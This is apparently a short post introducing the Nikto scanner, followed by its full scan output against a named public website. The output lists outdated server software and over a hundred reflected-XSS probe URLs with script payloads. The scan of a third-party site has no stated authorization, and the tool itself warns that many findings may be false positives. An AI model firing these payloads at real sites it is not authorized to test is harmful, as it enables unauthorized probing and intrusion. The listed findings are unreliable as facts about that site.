Nikto is an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 6400 potentially dangerous files/CGIs, checks for outdated versions of over 1200 servers, and version specific problems on over 270 servers.
sectools.org/tool/nikto/
#nikto -h www.targetanda.com
#nikto -h www.behindthename.com
strmn@strmnsLAB:~$ nikto -h www.behindthename.com– Nikto v2.1.6
—————————————————————————
+ Target IP: 199.167.135.172
+ Target Hostname: www.behindthename.com
+ Target Port: 80
+ Start Time: 2015-11-23 12:47:08 (GMT7)
—————————————————————————
+ Server: Apache/2.2.15 (CentOS)
+ Retrieved x-powered-by header: PHP/5.3.3
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Server leaks inodes via ETags, header found with file /crossdomain.xml, inode: 8128124, size: 165, mtime: Wed Nov 2 10:54:19 2011
+ “robots.txt” contains 1 entry which should be manually viewed.
+ Apache/2.2.15 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-7501: /themes/mambosimple.php?detection=detected&sitename=</title><script>alert(document.cookie)</script>: Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-7505: /emailfriend/emailnews.php?id=”<script>alert(document.cookie)</script>: Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-7504: /emailfriend/emailfaq.php?id=”<script>alert(document.cookie)</script>: Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-7503: /emailfriend/emailarticle.php?id=”<script>alert(document.cookie)</script>: Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ /administrator/upload.php?newbanner=1&choice=”<script>alert(document.cookie)</script>: Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-7495: /administrator/popups/sectionswindow.php?type=web&link=”<script>alert(document.cookie)</script>: Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-7498: /administrator/gallery/view.php?path=”<script>alert(document.cookie)</script>: Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-7499: /administrator/gallery/uploadimage.php?directory=”<script>alert(document.cookie)</script>: Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-7497: /administrator/gallery/navigation.php?directory=”<script>alert(document.cookie)</script>: Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-7496: /administrator/gallery/gallery.php?directory=”<script>alert(document.cookie)</script>: Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ /https-admserv/bin/index?/<script>alert(document.cookie)</script>: Sun ONE Web Server 6.1 administration control is vulnerable to XSS attacks.
+ OSVDB-2876: /clusterframe.jsp?cluster=<script>alert(document.cookie)</script>: Macromedia JRun 4.x JMC Interface, clusterframe.jsp file is vulnerable to a XSS attack.
+ /upload.php?type=”<script>alert(document.cookie)</script>: Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-4619: /soinfo.php?”><script>alert(‘Vulnerable’)</script>: The PHP script soinfo.php is vulnerable to Cross Site Scripting. Set expose_php = Off in php.ini.
+ /666%0a%0a<script>alert(‘Vulnerable’);</script>666.jsp: Apache Tomcat 4.1 / Linux is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ /servlet/MsgPage?action=test&msg=<script>alert(‘Vulnerable’)</script>: NetDetector 3.0 and below are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ /servlet/org.apache.catalina.ContainerServlet/<script>alert(‘Vulnerable’)</script>: Apache-Tomcat is vulnerable to Cross Site Scripting (XSS) by invoking java classes. http://www.cert.org/advisories/CA-2000-02.html.
+ /servlet/org.apache.catalina.Context/<script>alert(‘Vulnerable’)</script>: Apache-Tomcat is vulnerable to Cross Site Scripting (XSS) by invoking java classes. http://www.cert.org/advisories/CA-2000-02.html.
+ /servlet/org.apache.catalina.Globals/<script>alert(‘Vulnerable’)</script>: Apache-Tomcat is vulnerable to Cross Site Scripting (XSS) by invoking java classes. http://www.cert.org/advisories/CA-2000-02.html.
+ /servlet/org.apache.catalina.servlets.WebdavStatus/<script>alert(‘Vulnerable’)</script>: Apache-Tomcat is vulnerable to Cross Site Scripting (XSS) by invoking java classes. http://www.cert.org/advisories/CA-2000-02.html.
+ /servlets/MsgPage?action=badlogin&msg=<script>alert(‘Vulnerable’)</script>: The NetDetector install is vulnerable to Cross Site Scripting (XSS) in its invalid login message. http://www.cert.org/advisories/CA-2000-02.html.
+ /admin/sh_taskframes.asp?Title=Configuraci%C3%B3n%20de%20registro%20Web&URL=MasterSettings/Web_LogSettings.asp?tab1=TabsWebServer%26tab2=TabsWebLogSettings%26__SAPageKey=5742D5874845934A134CD05F39C63240&ReturnURL=”><script>alert(document.cookie)</script>: IIS 6 on Windows 2003 is vulnerable to Cross Site Scripting (XSS) in certain error messages. http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-17665: /SiteServer/Knowledge/Default.asp?ctr=”><script>alert(‘Vulnerable’)</script>: Site Server is vulnerable to Cross Site Scripting
+ OSVDB-17666: /_mem_bin/formslogin.asp?”><script>alert(‘Vulnerable’)</script>: Site Server is vulnerable to Cross Site Scripting
+ /nosuchurl/><script>alert(‘Vulnerable’)</script>: JEUS is vulnerable to Cross Site Scripting (XSS) when requesting non-existing JSP pages. http://securitytracker.com/alerts/2003/Jun/1007004.html
+ OSVDB-3624: /webcalendar/week.php?eventinfo=<script>alert(document.cookie)</script>: Webcalendar 0.9.42 and below are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-9234: /cgi-bin/YaBB/YaBB.cgi?board=BOARD&action=display&num=<script>alert(‘Vulnerable’)</script>: YaBB 1 Gold SP1 and earlier are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ /cgi-bin/vq/demos/respond.pl?<script>alert(‘Vulnerable’)</script>: vqServer default CGI files are vulnerable to Cross Site Scripting (XSS), remove all default CGI files. http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-6458: /cgi-bin/viewcvs.cgi/viewcvs/viewcvs/?sortby=rev”><script>alert(‘Vulnerable’)</script>;: ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-6458: /cgi-bin/viewcvs.cgi/viewcvs/?cvsroot=<script>alert(‘Vulnerable’)</script>: ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html.
+ /cgi-bin/test-cgi.exe?<script>alert(document.cookie)</script>: Default CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-9230: /cgi-bin/search.pl?Realm=All&Match=0&Terms=test&nocpp=1&maxhits=10&;Rank=<script>alert(‘Vulnerable’)</script>: Fluid Dynamics FD Search engine from http://www.xav.com/ is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html. Upgrade to FDSE version 2.0.0.0055
+ OSVDB-2322: /cgi-bin/search.php?searchstring=<script>alert(document.cookie)</script>: Gallery 1.3.4 and below is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.securityfocus.com/bid/8288.
+ OSVDB-8661: /cgi-bin/fom/fom.cgi?cmd=<script>alert(‘Vulnerable’)</script>&file=1&keywords=vulnerable: Faq-O-Matic is vulnerable to Cross Site Scripting (XSS) http://www.cert.org/advisories/CA-2000-02.html. Check for updates here http://faqomatic.sourceforge.net/fom-serve/cache/1.html
+ OSVDB-54110: /cgi-bin/fom.cgi?file=<script>alert(‘Vulnerable’)</script>: Faq-O-Matic is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest from http://sourceforge.net/projects/faqomatic. http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-2748: /cgi-bin/dansguardian.pl?DENIEDURL=</a><script>alert(‘Vulnerable’);</script>: CensorNet Proxy Service is vulnerable to Cross Site Scripting (XSS) in error pages. http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-651: /cgi-bin/cgicso?query=<script>alert(‘Vulnerable’)</script>: This CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5031: /cgi-bin/betsie/parserl.pl/<script>alert(‘Vulnerable’)</script>;: BBC Education Text to Speech Internet Enhancer from http://www.bbc.co.uk/education/betsie/ allows Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-9283: /cgi-bin/.cobalt/alert/service.cgi?service=<script>alert(‘Vulnerable’)</script>: Cobalt RaQ 4 administration CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ /~/<script>alert(‘Vulnerable’)</script>.aspx?aspxerrorpath=null: Cross site scripting (XSS) is allowed with .aspx file requests (may be Microsoft .net). http://www.cert.org/advisories/CA-2000-02.html
+ /~/<script>alert(‘Vulnerable’)</script>.aspx: Cross site scripting (XSS) is allowed with .aspx file requests (may be Microsoft .net). http://www.cert.org/advisories/CA-2000-02.html
+ /~/<script>alert(‘Vulnerable’)</script>.asp: Cross site scripting (XSS) is allowed with .asp file requests (may be Microsoft .net). http://www.cert.org/advisories/CA-2000-02.html
+ /catinfo?<u><b>TESTING: The Interscan Viruswall catinfo script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ /user.php?op=userinfo&uname=<script>alert(‘hi’);</script>: The PHP-Nuke installation is vulnerable to Cross Site Scripting (XSS). Update to versions above 5.3.1. http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-41361: /templates/form_header.php?noticemsg=<script>javascript:alert(document.cookie)</script>: MyMarket 1.71 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-9238: /supporter/index.php?t=updateticketlog&id=<script><script>alert(‘Vulnerable’)</script></script>: MyHelpdesk from http://myhelpdesk.sourceforge.net/ versions v20020509 and older are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-9238: /supporter/index.php?t=tickettime&id=<script><script>alert(‘Vulnerable’)</script></script>: MyHelpdesk from http://myhelpdesk.sourceforge.net/ versions v20020509 and older are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-9238: /supporter/index.php?t=ticketfiles&id=<script><script>alert(‘Vulnerable’)</script></script>: MyHelpdesk from http://myhelpdesk.sourceforge.net/ versions v20020509 and older are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ /sunshop.index.php?action=storenew&username=<script>alert(‘Vulnerable’)</script>: SunShop is vulnerable to Cross Site Scripting (XSS) in the signup page. CA-200-02.
+ OSVDB-20232: /submit.php?subject=<script>alert(‘Vulnerable’)</script>&story=<script>alert(‘Vulnerable’)</script>&storyext=<script>alert(‘Vulnerable’)</script>&op=Preview: This install of PHP-Nuke is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-27097: /ss000007.pl?PRODREF=<script>alert(‘Vulnerable’)</script>: Actinic E-Commerce services is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5049: /setup.exe?<script>alert(‘Vulnerable’)</script>&page=list_users&user=P: CiscoSecure ACS v3.0(1) Build 40 allows Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-2689: /servlet/ContentServer?pagename=<script>alert(‘Vulnerable’)</script>: Open Market Inc. ContentServer is vulnerable to Cross Site Scripting (XSS) in the login-error page. http://www.cert.org/advisories/CA-2000-02.html.
+ /search.asp?term=<script>alert(‘Vulnerable’)</script>: ASP.Net 1.1 may allow Cross Site Scripting (XSS) in error pages (only some browsers will render this). http://www.cert.org/advisories/CA-2000-02.html.
+ /samples/search.dll?query=<script>alert(document.cookie)</script>&logic=AND: Sambar Server default script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ /replymsg.php?send=1&destin=<script>alert(‘Vulnerable’)</script>: This version of PHP-Nuke’s replymsg.php is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-4599: /pm_buddy_list.asp?name=A&desc=B%22%3E<script>alert(‘Vulnerable’)</script>%3Ca%20s=%22&code=1: Web Wiz Forums ver. 7.01 and below is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ /phpwebsite/index.php?module=search&SEA_search_op=continue&PDA_limit=10″><script>alert(‘Vulnerable’)</script>: phpWebSite 0.9.x and below are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ /phpwebsite/index.php?module=pagemaster&PAGE_user_op=view_page&PAGE_id=10″><script>alert(‘Vulnerable’)</script>&MMN_position=[X:X]: phpWebSite 0.9.x and below are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ /phpwebsite/index.php?module=fatcat&fatcat[user]=viewCategory&fatcat_id=1+”><script>alert(‘Vulnerable’)</script>: phpWebSite 0.9.x and below are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ /phpwebsite/index.php?module=calendar&calendar[view]=day&month=2&year=2003&day=1+”><script>alert(‘Vulnerable’)</script>: phpWebSite 0.9.x and below are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-59093: /phptonuke.php?filnavn=<script>alert(‘Vulnerable’)</script>: PHP-Nuke add-on PHPToNuke is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-32774: /phpinfo.php?VARIABLE=<script>alert(‘Vulnerable’)</script>: Contains PHP configuration information and is vulnerable to Cross Site Scripting (XSS).
+ OSVDB-32774: /phpinfo.php3?VARIABLE=<script>alert(‘Vulnerable’)</script>: Contains PHP configuration information and is vulnerable to Cross Site Scripting (XSS).
+ OSVDB-2193: /phpBB/viewtopic.php?topic_id=<script>alert(‘Vulnerable’)</script>: phpBB is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-4297: /phpBB/viewtopic.php?t=17071&highlight=”>”<script>javascript:alert(document.cookie)</script>: phpBB is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-11145: /phorum/admin/header.php?GLOBALS[message]=<script>alert(‘Vulnerable’)</script>: Phorum 3.3.2a and below from phorum.org is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-11144: /phorum/admin/footer.php?GLOBALS[message]=<script>alert(‘Vulnerable’)</script>: Phorum 3.3.2a and below from phorum.org is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ /Page/1,10966,,00.html?var=<script>alert(‘Vulnerable’)</script>: Vignette server is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html. Upgrade to the latest version.
+ /node/view/666″><script>alert(document.domain)</script>: Drupal 4.2.0 RC is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5106: /netutils/whodata.stm?sitename=<script>alert(document.cookie)</script>: Sambar Server default script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ /nav/cList.php?root=</script><script>alert(‘Vulnerable’)/<script>: RaQ3 server script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ /myhome.php?action=messages&box=<script>alert(‘Vulnerable’)</script>: OpenBB 1.0.0 RC3 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ /msadm/user/login.php3?account_name=”><script>alert(‘Vulnerable’)</script>: The Sendmail Server Site User login is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ /msadm/site/index.php3?authid=”><script>alert(‘Vulnerable’)</script>: The Sendmail Server Site Administrator Login is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ /msadm/domain/index.php3?account_name=”><script>alert(‘Vulnerable’)</script>: The Sendmail Server Site Domain Administrator login is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-50539: /modules/Submit/index.php?op=pre&title=<script>alert(document.cookie);</script>: Basit cms 1.0 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ /modules/Forums/bb_smilies.php?site_font=}–></style><script>alert(‘Vulnerable’)</script>: PHP-Nuke 6.0 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ /modules/Forums/bb_smilies.php?name=<script>alert(‘Vulnerable’)</script>: PHP-Nuke 6.0 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ /modules/Forums/bb_smilies.php?Default_Theme=<script>alert(‘Vulnerable’)</script>: PHP-Nuke 6.0 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ /modules/Forums/bb_smilies.php?bgcolor1=”><script>alert(‘Vulnerable’)</script>: PHP-Nuke 6.0 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ /modules.php?op=modload&name=Xforum&file=member&action=viewpro&member=<script>alert(‘Vulnerable’)</script>: The XForum (PHP-Nuke Add-on module) is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ /modules.php?op=modload&name=Xforum&file=<script>alert(‘Vulnerable’)</script>&fid=2: The XForum (PHP-Nuke Add-on module) is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5498: /modules.php?op=modload&name=Wiki&file=index&pagename=<script>alert(‘Vulnerable’)</script>: Wiki PostNuke Module is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ /modules.php?op=modload&name=Web_Links&file=index&l_op=viewlink&cid=<script>alert(‘Vulnerable’)</script>: The PHP-Nuke forum is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ /modules.php?op=modload&name=WebChat&file=index&roomid=<script>alert(‘Vulnerable’)</script>: The PHP-Nuke forum is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ /modules.php?op=modload&name=Members_List&file=index&letter=<script>alert(‘Vulnerable’)</script>: This install of PHP-Nuke’s modules.php is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ /modules.php?op=modload&name=Guestbook&file=index&entry=<script>alert(‘Vulnerable’)</script>: The PHP-Nuke forum is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-20235: /modules.php?op=modload&name=DMOZGateway&file=index&topic=<script>alert(‘Vulnerable’)</script>: The DMOZGateway (PHP-Nuke Add-on module) is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ /modules.php?name=Your_Account&op=userinfo&username=bla<script>alert(document.cookie)</script>: Francisco Burzi PHP-Nuke 5.6, 6.0, 6.5 RC1/RC2/RC3, 6.5 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ /modules.php?name=Your_Account&op=userinfo&uname=<script>alert(‘Vulnerable’)</script>: The PHP-Nuke forum is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ /modules.php?name=Surveys&pollID=<script>alert(‘Vulnerable’)</script>: The PHP-Nuke forum is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-6226: /modules.php?name=Stories_Archive&sa=show_month&year=<script>alert(‘Vulnerable’)</script>&month=3&month_l=test: The PHP-Nuke forum is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-6226: /modules.php?name=Stories_Archive&sa=show_month&year=2002&month=03&month_l=<script>alert(‘Vulnerable’)</script>: The PHP-Nuke forum is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5914: /modules.php?name=Downloads&d_op=viewdownloaddetails&lid=02&ttitle=<script>alert(‘Vulnerable’)</script>: This install of PHP-Nuke is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ /modules.php?name=Classifieds&op=ViewAds&id_subcatg=75&id_catg=<script>alert(‘Vulnerable’)</script>: The PHP-Nuke forum is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-3201: /megabook/admin.cgi?login=<script>alert(‘Vulnerable’)</script>: Megabook guestbook is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ /mailman/listinfo/<script>alert(‘Vulnerable’)</script>: Mailman is vulnerable to Cross Site Scripting (XSS). Upgrade to version 2.0.8 to fix. http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-9256: /launch.jsp?NFuse_Application=<script>alert(‘Vulnerable’)</script>: NFuse is vulnerable to cross site scripting (XSS) in the GetLastError function. Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-9257: /launch.asp?NFuse_Application=<script>alert(‘Vulnerable’)</script>: NFuse is vulnerable to cross site scripting (XSS) in the GetLastError function. Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-5803: /isapi/testisa.dll?check1=<script>alert(document.cookie)</script>: Sambar Server default script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ /html/partner.php?mainfile=anything&Default_Theme='<script>alert(document.cookie);</script>: myphpnuke version 1.8.8_final_7 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ /html/chatheader.php?mainfile=anything&Default_Theme='<script>alert(document.cookie);</script>: myphpnuke version 1.8.8_final_7 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ /html/cgi-bin/cgicso?query=<script>alert(‘Vulnerable’)</script>: This CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-2322: /gallery/search.php?searchstring=<script>alert(document.cookie)</script>: Gallery 1.3.4 and below is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.securityfocus.com/bid/8288.
+ OSVDB-20234: /friend.php?op=SiteSent&fname=<script>alert(‘Vulnerable’)</script>: This version of PHP-Nuke’s friend.php is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-31694: /forums/index.php?board=;action=login2&user=USERNAME&cookielength=120&passwrd=PASSWORD<script>alert(‘Vulnerable’)</script>: YaBB is vulnerable to Cross Site Scripting (XSS) in the password field of the login page. http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-9231: /error/500error.jsp?et=1<script>alert(‘Vulnerable’)</script>;: Macromedia Sitespring 1.2.0(277.1) on Windows 2000 is vulnerable to Cross Site Scripting (XSS) in the error pages. http://www.cert.org/advisories/CA-2000-02.html.
+ /download.php?sortby=&dcategory=<script>alert(‘Vulnerable’)</script>: This version of PHP-Nuke’s download.php is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html.
+ /comments.php?subject=<script>alert(‘Vulnerable’)</script>&comment=<script>alert(‘Vulnerable’)</script>&pid=0&sid=0&mode=&order=&thold=op=Preview: This version of PHP-Nuke’s comments.php is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-50619: /cleartrust/ct_logon.asp?CTLoginErrorMsg=<script>alert(1)</script>: RSA ClearTrust allows Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-651: /cgi-local/cgiemail-1.6/cgicso?query=<script>alert(‘Vulnerable’)</script>: This CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-651: /cgi-local/cgiemail-1.4/cgicso?query=<script>alert(‘Vulnerable’)</script>: This CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-7022: /calendar.php?year=<script>alert(document.cookie);</script>&month=03&day=05: DCP-Portal v5.3.1 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-27096: /ca000007.pl?ACTION=SHOWCART&REFPAGE=”><script>alert(‘Vulnerable’)</script>: Actinic E-Commerce services is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-27097: /ca000001.pl?ACTION=SHOWCART&hop=”><script>alert(‘Vulnerable’)</script>&PATH=acatalog%2f: Actinic E-Commerce services is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-27095: /bb000001.pl<script>alert(‘Vulnerable’)</script>: Actinic E-Commerce services is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ /article.cfm?id=1′<script>alert(document.cookie);</script>: With malformed URLs, ColdFusion is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-4765: /apps/web/vs_diag.cgi?server=<script>alert(‘Vulnerable’)</script>: Zeus 4.2r2 (webadmin-4.2r2) is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-2243: /addressbook/index.php?surname=<script>alert(‘Vulnerable’)</script>: Phpgroupware 0.9.14.003 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-2243: /addressbook/index.php?name=<script>alert(‘Vulnerable’)</script>: Phpgroupware 0.9.14.003 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ /add.php3?url=ja&adurl=javascript:<script>alert(‘Vulnerable’)</script>: 1.1 http://www.sugarfreenet.com/ is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ /a?<script>alert(‘Vulnerable’)</script>: Server is vulnerable to Cross Site Scripting (XSS) in the error message if code is passed in the query-string. This may be a Null HTTPd server.
+ OSVDB-54589: /a.jsp/<script>alert(‘Vulnerable’)</script>: JServ is vulnerable to Cross Site Scripting (XSS) when a non-existent JSP file is requested. Upgrade to the latest version of JServ. http://www.cert.org/advisories/CA-2000-02.html.
+ /<script>alert(‘Vulnerable’)</script>.thtml: Server is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ /<script>alert(‘Vulnerable’)</script>.shtml: Server is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ /<script>alert(‘Vulnerable’)</script>.jsp: Server is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ /<script>alert(‘Vulnerable’)</script>.aspx: Cross site scripting (XSS) is allowed with .aspx file requests (may be Microsoft .net). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-6662: /<script>alert(‘Vulnerable’)</script>: Server is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-9239: /mailman/admin/ml-name?”><script>alert(‘Vulnerable’)</script>;: Mailman is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-25499: /affich.php?image=<script>alert(document.cookie)</script>: GPhotos index.php rep Variable XSS.
+ OSVDB-25498: /diapo.php?rep=<script>alert(document.cookie)</script>: GPhotos index.php rep Variable XSS.
+ OSVDB-700: /fcgi-bin/echo?foo=<script>alert(‘Vulnerable’)</script>: Fast-CGI has two default CGI programs (echo.exe/echo2.exe) vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-3954: /fcgi-bin/echo2?foo=<script>alert(‘Vulnerable’)</script>: Fast-CGI has two default CGI programs (echo.exe/echo2.exe) vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
